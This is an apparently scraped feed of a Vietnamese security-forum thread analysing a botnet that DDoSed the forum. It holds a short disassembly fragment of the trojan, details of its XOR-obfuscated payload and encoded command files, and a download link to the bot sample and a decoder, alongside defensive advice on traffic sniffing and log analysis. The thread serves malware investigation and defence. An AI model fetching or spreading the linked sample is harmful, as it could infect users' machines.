.text:1000196B 020     call    ds:ExitProcess
.text:1000196B
.text:10001971     ; ---------------------------------------------------------------------------
.text:10001971
.text:10001971     DefaultHandler:                         ; CODE XREF: MSDataWndProc+14j
.text:10001971                                             ; MSDataWndProc+21j
.text:10001971                                             ; DATA XREF: .text:WMHandlerTableo
.text:10001971 01C     mov     eax, [ebp+cbSize]
.text:10001974 01C     mov     edx, [ebp+wParam]
.text:10001977 01C     push    eax                         ; lParam
.text:10001978 020     mov     eax, [ebp+hWnd]
.text:1000197B 020     push    edx                         ; wParam
.text:1000197C 024     push    ecx                         ; Msg
.text:1000197D 028     push    eax                         ; hWnd
.text:1000197E 02C     call    ds:DefWindowProcA
.text:1000197E
.text:10001984 01C     pop     edi
.text:10001985 018     pop     esi
.text:10001986 014     pop     ebx
.text:10001987 010     mov     esp, ebp
.text:10001989 004     pop     ebp
.text:1000198A 000     retn    10h
.text:1000198A
.text:1000198A     MSDataWndProc endp
Hàm save_key_to_msdata_vxd_file cũng gần tương tự như code của hàm KbdHookProc. Mong được các bạn đóng góp kết quả RCE của các bạn, các thắc mắc, trao đổi...]]>
/hvaonline/posts/list/39641.html#248346 /hvaonline/posts/list/39641.html#248346 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#248350 /hvaonline/posts/list/39641.html#248350 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#248352 /hvaonline/posts/list/39641.html#248352 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Cái này thì em đồng ý với anh conmale. Em cũng là dân code, nhưng khi tái tạo lại source code của stl, thì em cứ quái, khùng không vầy trời ??? stl coder dùng rất nhiều kỹ thuật cao, ít phổ biến trong lập trình hệ thống trên Win32, nhưng khi mang các kỹ thuật đấy vào code thì lại code rất ngớ ngẩn, bug tá lã. Coding style tùm lum, không thống nhất, giống như anh em coder nhà ta code outsource, miển chạy, lấy tiền là được rồi. Vd nhé, trên cái hàm MSDataWndProc em vừa post, trước giờ stl coder hay và đang xài malloc, new, tự dưng lại phang vô HeapAlloc(GetProcessHeap(), size). Rồi khi CloseHandle, HeapFree thì lại không thèm check parameter truyền vào. May mà các API của Windows đã check, không thì crash cả đống "mèo què" hết. Để em đoán nhé, cái địa danh xuất hiện nhiều nhất có phải là Sandrex không anh conmale ? 
hì hì, anh quên hỏi cụ thể hơn: địa danh nào ở Việt Nam :).]]>
/hvaonline/posts/list/39641.html#248355 /hvaonline/posts/list/39641.html#248355 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#248388 /hvaonline/posts/list/39641.html#248388 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. để kiểm tra các liên kết nhưng trong list có cả trăm connection thì ai mà biết liên kết nào là của bọn nó.   Bạn hãy tắt hết các chương trình cần truy cập mạng của mình : Trình duyệt web, yahoo.... rồi bạn chạy chương trình SmartSniff, dow bản đã fix của anh TQN ở trang trước để tiến hành Sniff thôi. Khi có kết nối ra ngoài nó sẽ ghi nhận lại địa chỉ IP, bác có thể vào mấy trang kiểm tra IP để xem nó kết nối đi đâu :D ]]> /hvaonline/posts/list/39641.html#248389 /hvaonline/posts/list/39641.html#248389 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:

TQN wrote:
Cái này thì em đồng ý với anh conmale. Em cũng là dân code, nhưng khi tái tạo lại source code của stl, thì em cứ quái, khùng không vầy trời ??? stl coder dùng rất nhiều kỹ thuật cao, ít phổ biến trong lập trình hệ thống trên Win32, nhưng khi mang các kỹ thuật đấy vào code thì lại code rất ngớ ngẩn, bug tá lã. Coding style tùm lum, không thống nhất, giống như anh em coder nhà ta code outsource, miển chạy, lấy tiền là được rồi. Vd nhé, trên cái hàm MSDataWndProc em vừa post, trước giờ stl coder hay và đang xài malloc, new, tự dưng lại phang vô HeapAlloc(GetProcessHeap(), size). Rồi khi CloseHandle, HeapFree thì lại không thèm check parameter truyền vào. May mà các API của Windows đã check, không thì crash cả đống "mèo què" hết. Để em đoán nhé, cái địa danh xuất hiện nhiều nhất có phải là Sandrex không anh conmale ? 
hì hì, anh quên hỏi cụ thể hơn: địa danh nào ở Việt Nam :). 
em đoán đó là nha trang quê cũ của anh đúng không ?]]>
/hvaonline/posts/list/39641.html#248400 /hvaonline/posts/list/39641.html#248400 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#248406 /hvaonline/posts/list/39641.html#248406 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Hì hì, em thì chỉ nghĩ là stl phải nhắc nhiều nhất là Hà Nội hay Hải Phòng thôi ! Phải không anh conmale. Cho đáp án đi anh ;) Đừng có nói là tụi nó nhắc tới Gialai quê em nhé =)  
Hì hì, không phải Hà Nội, không phải Hải Phòng, không phải Gia Lai, cũng chẳng phải Nha Trang mà là: Thái Nguyên. @ namkaka: chắc chắn không phải Nha Trang của anh rồi. Dân Nha Trang hiền khô à.]]>
/hvaonline/posts/list/39641.html#248407 /hvaonline/posts/list/39641.html#248407 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#248464 /hvaonline/posts/list/39641.html#248464 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Hì hì, không phải Hà Nội, không phải Hải Phòng, không phải Gia Lai, cũng chẳng phải Nha Trang mà là: Thái Nguyên.   Ở Thái nguyên có bác Hoàng Hiệp "ghê gúm" lắm mà :D]]> /hvaonline/posts/list/39641.html#248466 /hvaonline/posts/list/39641.html#248466 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

tmd wrote:
Sao lại là "Thái Nguyên", vị trí địa lý này nằm ở khu vực thông tin nào vậy mr conmale. Thông này có lẽ nằm ở Thông tin zombie,thông tin server, thông tin whois,thông tin người bị lộ diện ...? 
Từ tất cả các nguồn có thể tổng hợp được chớ không riêng một nguồn nào hết.]]>
/hvaonline/posts/list/39641.html#248469 /hvaonline/posts/list/39641.html#248469 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#248479 /hvaonline/posts/list/39641.html#248479 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:

TQN wrote:
Hì hì, em thì chỉ nghĩ là stl phải nhắc nhiều nhất là Hà Nội hay Hải Phòng thôi ! Phải không anh conmale. Cho đáp án đi anh ;) Đừng có nói là tụi nó nhắc tới Gialai quê em nhé =)  
Hì hì, không phải Hà Nội, không phải Hải Phòng, không phải Gia Lai, cũng chẳng phải Nha Trang mà là: Thái Nguyên. @ namkaka: chắc chắn không phải Nha Trang của anh rồi. Dân Nha Trang hiền khô à. 
Sao lại là Thái Nguyên nhỡ :-O em không thấy có sự quan hệ hữu lý nào giữa một tình thuộc khu vực nghèo nhất phía bắc với một lực lượng khá hùng hậu và quy củ như stl @TQN: tớ không hiểu sao Gialai, Komtum, Daklak ... luôn là nơi phát tích rất nhiều cái tên rất nổi tiếng trong giới kỹ thuật ( giờ tính thêm lão nữa thì vấn đề này lại càng dc khẳng định ) :x ]]>
/hvaonline/posts/list/39641.html#248491 /hvaonline/posts/list/39641.html#248491 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

xnohat wrote:

conmale wrote:

TQN wrote:
Hì hì, em thì chỉ nghĩ là stl phải nhắc nhiều nhất là Hà Nội hay Hải Phòng thôi ! Phải không anh conmale. Cho đáp án đi anh ;) Đừng có nói là tụi nó nhắc tới Gialai quê em nhé =)  
Hì hì, không phải Hà Nội, không phải Hải Phòng, không phải Gia Lai, cũng chẳng phải Nha Trang mà là: Thái Nguyên. @ namkaka: chắc chắn không phải Nha Trang của anh rồi. Dân Nha Trang hiền khô à. 
Sao lại là Thái Nguyên nhỡ :-O em không thấy có sự quan hệ hữu lý nào giữa một tình thuộc khu vực nghèo nhất phía bắc với một lực lượng khá hùng hậu và quy củ như stl @TQN: tớ không hiểu sao Gialai, Komtum, Daklak ... luôn là nơi phát tích rất nhiều cái tên rất nổi tiếng trong giới kỹ thuật ( giờ tính thêm lão nữa thì vấn đề này lại càng dc khẳng định ) :x  
Vậy mới gọi là lý thú em :). Khu vực nghèo không có nghĩa là không đủ khả năng tài chính. Một khía cạnh cần chú ý là trojan của stl có thể lấy đến ID của HHD, CPU... thì chuyện thẻ tín dụng của nạn nhân được chi dụng không phải là chuyện không thể xảy ra.]]>
/hvaonline/posts/list/39641.html#248503 /hvaonline/posts/list/39641.html#248503 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Sao lại là Thái Nguyên nhỡ em không thấy có sự quan hệ hữu lý nào giữa một tình thuộc khu vực nghèo nhất phía bắc với một lực lượng khá hùng hậu và quy củ như stl   Tỉnh nghèo nhất phía Bắc ??? Nên xem lại quê mình đi :| ... ]]> /hvaonline/posts/list/39641.html#248508 /hvaonline/posts/list/39641.html#248508 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#248519 /hvaonline/posts/list/39641.html#248519 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#248559 /hvaonline/posts/list/39641.html#248559 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#248577 /hvaonline/posts/list/39641.html#248577 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#248588 /hvaonline/posts/list/39641.html#248588 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

xnohat wrote:
@TQN: tớ không hiểu sao Gialai, Komtum, Daklak ... luôn là nơi phát tích rất nhiều cái tên rất nổi tiếng trong giới kỹ thuật ( giờ tính thêm lão nữa thì vấn đề này lại càng dc khẳng định ) :x  
Vụ này thì em không dám nhận à nhe, tha cho em. Dân Gialai em chỉ có bầu Đức, Quốc Cường Gialai thì nổi tiếng về KD thôi, chứ về kỹ thuật thì em không biết ! Dân Gialai em được cái uống cafe nguyên chất, thơm, ngon, không pha lạt như nước đường như ở nơi khác thôi, phải không đồng hương McSteven ;) ]]>
/hvaonline/posts/list/39641.html#248602 /hvaonline/posts/list/39641.html#248602 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:

xnohat wrote:
@TQN: tớ không hiểu sao Gialai, Komtum, Daklak ... luôn là nơi phát tích rất nhiều cái tên rất nổi tiếng trong giới kỹ thuật ( giờ tính thêm lão nữa thì vấn đề này lại càng dc khẳng định ) :x  
Vụ này thì em không dám nhận à nhe, tha cho em. Dân Gialai em chỉ có bầu Đức, Quốc Cường Gialai thì nổi tiếng về KD thôi, chứ về kỹ thuật thì em không biết ! Dân Gialai em được cái uống cafe nguyên chất, thơm, ngon, không pha lạt như nước đường như ở nơi khác thôi, phải không đồng hương McSteven ;)  
Ngoài cà phê ra thì còn có "em Pleiku, má đỏ môi hồng, ở đây buổi chiều quanh năm mùa đông... " nữa, he he. Lên Pleiku có một lần cách đây gần 30 năm nhưng vẫn còn nhớ rõ thị trấn bé nhỏ hiền hoà và những con người cực kỳ dễ thương. Tối hôm qua server nhánh bên Đức bị sự cố. Tụi data center thấy nó bị "offline" nên tự động restart lại nhưng vì lý do gì đó, firewall không start. Sáng nay chui vô thì thấy... mèn đét quơi.... DDoS thẳng vô / tá lả bùng binh luôn. Toàn là IP của Việt Nam. Kiểu này phải "sống chung với lũ" lâu dài rồi đây.]]>
/hvaonline/posts/list/39641.html#248604 /hvaonline/posts/list/39641.html#248604 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#248613 /hvaonline/posts/list/39641.html#248613 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#248615 /hvaonline/posts/list/39641.html#248615 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#248638 /hvaonline/posts/list/39641.html#248638 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

McSteven wrote:
Nói về cafe thì uống 1 cốc nhỏ là đủ thức trắng đêm! Không nhiều đá như trong Sài Gòn này. Như anh Conmale nói thì HVA vẫn còn DDOS sao? Em tưởng hết rối chứ.  
hiện tại vẫn còn, nhưng bị firewall block hết,theo em nghĩ đó là những bot tàn dư còn sót lại mặc định Ddos HVA mà chưa được diệt, chứ có thằng nào rảnh hơi rảnh thời gian ngồi ddos mà không thu được kết quả gì.]]>
/hvaonline/posts/list/39641.html#248672 /hvaonline/posts/list/39641.html#248672 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#248779 /hvaonline/posts/list/39641.html#248779 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#249235 /hvaonline/posts/list/39641.html#249235 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

fptbinhduong wrote:
sao chủ đề không tiếp tục vậy???? buồn vậy không có gì để đọc hết, đã 10 ngày trôi qua.... 
Không nên chỉ đọc không rồi ngồi chờ người khác viết để đọc tiếp mà hãy hành động, một ví dụ thiết thực mà mọi người có thể làm là phổ biến, nâng cao ý thức cảnh giác bảo mật và các kĩ năng sử dụng máy tính an toàn cho cộng đồng :) .]]>
/hvaonline/posts/list/39641.html#249240 /hvaonline/posts/list/39641.html#249240 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#249255 /hvaonline/posts/list/39641.html#249255 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#249279 /hvaonline/posts/list/39641.html#249279 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

xuanphongdocco wrote:
Ôi đọc 40 trang xong muốn thổ huyết luôn. Các bot net này toàn sống trong hệ thống Windows thôi phải không ạ? 
Bạn đọc 40 trang xong mà hỏi một câu như trên thì quả là.... kỳ lạ :-) .]]>
/hvaonline/posts/list/39641.html#249299 /hvaonline/posts/list/39641.html#249299 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:

xuanphongdocco wrote:
Ôi đọc 40 trang xong muốn thổ huyết luôn. Các bot net này toàn sống trong hệ thống Windows thôi phải không ạ? 
Bạn đọc 40 trang xong mà hỏi một câu như trên thì quả là.... kỳ lạ :-) . 
KK, có kẻ trúng kế và đã lên tiếng. Cty em có khoảng 300 pc, em định cài 1 con squid để log http request. Em tính test xem trong đàn pc nhà e có con nào dính chưởng chưa. Như vậy có khả dĩ không?]]>
/hvaonline/posts/list/39641.html#249318 /hvaonline/posts/list/39641.html#249318 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

xuanphongdocco wrote:

conmale wrote:

xuanphongdocco wrote:
Ôi đọc 40 trang xong muốn thổ huyết luôn. Các bot net này toàn sống trong hệ thống Windows thôi phải không ạ? 
Bạn đọc 40 trang xong mà hỏi một câu như trên thì quả là.... kỳ lạ :-) . 
KK, có kẻ trúng kế và đã lên tiếng. Cty em có khoảng 300 pc, em định cài 1 con squid để log http request. Em tính test xem trong đàn pc nhà e có con nào dính chưởng chưa. Như vậy có khả dĩ không? 
Cái gì mà "trúng kế và lên tiếng" gì đây? Có thắc mắc thì cứ việc mà hỏi chớ việc gì phải "trúng kế" hay "trật kế" cho phiền vậy? Dạng malware / zombies này dùng low level sockets để connect tới nạn nhân bị DDoS. Nếu bồ dùng squid thì squid phải là transparent proxy và phải có cơ chế force requests đi đến cổng 80 bắt buộc phải đi xuyên qua squid thì mới có thể dựa vào log của squid mà kiểm tra.]]>
/hvaonline/posts/list/39641.html#249319 /hvaonline/posts/list/39641.html#249319 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#249339 /hvaonline/posts/list/39641.html#249339 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:

xuanphongdocco wrote:

conmale wrote:

xuanphongdocco wrote:
Ôi đọc 40 trang xong muốn thổ huyết luôn. Các bot net này toàn sống trong hệ thống Windows thôi phải không ạ? 
Bạn đọc 40 trang xong mà hỏi một câu như trên thì quả là.... kỳ lạ :-) . 
KK, có kẻ trúng kế và đã lên tiếng. Cty em có khoảng 300 pc, em định cài 1 con squid để log http request. Em tính test xem trong đàn pc nhà e có con nào dính chưởng chưa. Như vậy có khả dĩ không? 
Cái gì mà "trúng kế và lên tiếng" gì đây? Có thắc mắc thì cứ việc mà hỏi chớ việc gì phải "trúng kế" hay "trật kế" cho phiền vậy? Dạng malware / zombies này dùng low level sockets để connect tới nạn nhân bị DDoS. Nếu bồ dùng squid thì squid phải là transparent proxy và phải có cơ chế force requests đi đến cổng 80 bắt buộc phải đi xuyên qua squid thì mới có thể dựa vào log của squid mà kiểm tra. 
Đúng vậy đó vấn đề chua nhất là chiên xào làm sao với cái đống log mà nó ghi lại dc, coi bằng tay thì ko nỗi rùi. Phải có con agent nào đó chạy như service đọc tự động. Mỗi ngày mình vào check những link lạ vừa truy cập thì dễ thở hơn. Công việc hằng ngày có việc này việc nọ nên không thể take care nó full time dc.]]>
/hvaonline/posts/list/39641.html#249347 /hvaonline/posts/list/39641.html#249347 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

shuichi_akai wrote:
Em thắc mắc không biết có công cụ nào để giám sát traffic hiệu quả trong trường hợp lượng truy cập lớn? Vài trăm máy tính mà mỗi máy mở 1 trang không thôi thì lượng connections đã khá nhiều rồi, giả sử có bị botnet thì khả năng đọc log chắc cũng ngang ... tốc độ ánh sáng. Hay là anh có mẹo gì nữa ạ? :D 
Có mẹo gì đâu. Phân tích logs thì chỉ có Perl, không thì một mới cat, sed, awk, grep, sort, uniq là đủ. Làm admin thì mấy cái này là cơ bản mà em. Ai lại ngồi đó đọc log từng dòng? ;).]]>
/hvaonline/posts/list/39641.html#249358 /hvaonline/posts/list/39641.html#249358 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#249584 /hvaonline/posts/list/39641.html#249584 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. sự thật.]]> /hvaonline/posts/list/39641.html#249600 /hvaonline/posts/list/39641.html#249600 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:
Các anh em cũng đã từng rất tâm đắc với câu "muốn không ai biết mình làm gì thì đừng làm" và câu này cũng không phải là ngoại lệ đối với các anh em. Các anh em cũng nên biết rằng, có một thứ trên đời này không thể thay đổi được đó là: sự thật
:D ]]>
/hvaonline/posts/list/39641.html#249637 /hvaonline/posts/list/39641.html#249637 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#265382 /hvaonline/posts/list/39641.html#265382 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
File xv.jpg chỉ vỏn vẹn dòng text này: Code:
2011-07-20 16:28:52
Ê, đệ tử, xem trong file xv.jpg nè, tao ra lệnh mày đúng hay quá giờ đó là stop tấn công với các chỉ dẩn từ xc.jpg nghe chưa. Dạ thưa sếp STL, em nghe lệnh. Thằng chủ nhân cái máy này nó không biết đâu, nó là zoombies của "Sống chết theo lệnh" tụi mình mà, he he !!!??? File Exe bot + config của nó em post ở đây: http://www.mediafire.com/?c57bbuc7iwq3ca4 Trong file này còn có file Decode.exe và source Decode.cpp để decode nội dung file xc.jpg ra file .xml để bà con xem. File IDA 61 database chứa thông tin disassembly của con AcrobatUpdater.exe, file images01.gif là chính là file AcrobatUpdater.exe với toàn bộ nội dung đã bị xor với 0x19. 
Nghe code có vẻ như là thời gian ddos hay là hẹn giờ để ddos hay sao ấy?]]>
/hvaonline/posts/list/39641.html#265470 /hvaonline/posts/list/39641.html#265470 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo wrote:
http://www.threatexpert.com/report.aspx?md5=d517e448e15f3ea3b0405b7679eccfd7 Mình thấy trên Threatexpert rồi, không biết KIS submit hay là TQN or Conmale submit. Btw, với việc đưa lên đây thì các trình AV sẽ update nhanh thôi, tốt hơn nhiều so với việc viết cái tool remove nó. Giá mà BKAV update nhanh thì tốt, vì BKAV rất phổ biến ở các Computers của nhà nước (một số lượng khá lớn). =)) ------------------------------------------------------------------------------ Bạn AVIRA sẽ đưa cái này vào bản update tiếp theo (chắc ngày mai) - Avira ở VN dùng hơi nhiều: AcrobatUpdater.exe MALWARE The file 'AcrobatUpdater.exe' has been determined to be 'MALWARE'.Our analysts named the threat .The term "TR/" denotes a trojan horse that is able to spy out data, to violate your privacy or carry out unwanted modifications to the system.Detection will be added to our virus definition file (VDF) with one of the next updates. 
[url=http://www.upanh.com/upanh_acrobatupdater.exe/v/drp25hal7ss.htm]
[/url]]]>
/hvaonline/posts/list/39641.html#267093 /hvaonline/posts/list/39641.html#267093 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#267107 /hvaonline/posts/list/39641.html#267107 GMT